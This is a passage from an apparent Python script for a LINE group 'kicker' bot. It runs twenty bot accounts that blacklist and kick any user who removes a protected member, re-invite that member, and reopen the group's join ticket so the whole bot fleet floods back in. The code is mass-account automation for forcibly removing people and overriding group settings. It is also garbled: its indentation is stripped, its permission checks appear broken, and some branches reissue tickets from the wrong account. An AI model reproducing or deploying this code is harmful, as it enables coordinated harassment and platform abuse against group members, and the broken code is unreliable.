kicker18.updateGroup(G)
Ticket = kicker18.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker18.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker18.updateGroup(G)
Ticket = kicker18.reissueGroupTicket(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
pass
return
if ga5 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
G = kicker19.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.updateGroup(G)
Ticket = kicker19.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker19.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker19.updateGroup(G)
Ticket = kicker19.reissueGroupTicket(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
pass
return
if ga6 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
G = kicker20.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.updateGroup(G)
Ticket = kicker20.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker20.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker20.updateGroup(G)
Ticket = kicker20.reissueGroupTicket(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
pass
return
if ga7 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
G = kicker.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
pass
return
if ga8 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
G = kicker2.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker2.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker2.updateGroup(G)
Ticket = kicker2.reissueGroupTicket(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
pass
return
if ga9 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
G = kicker3.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker3.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker3.updateGroup(G)
Ticket = kicker3.reissueGroupTicket(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
pass
return
if ga10 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
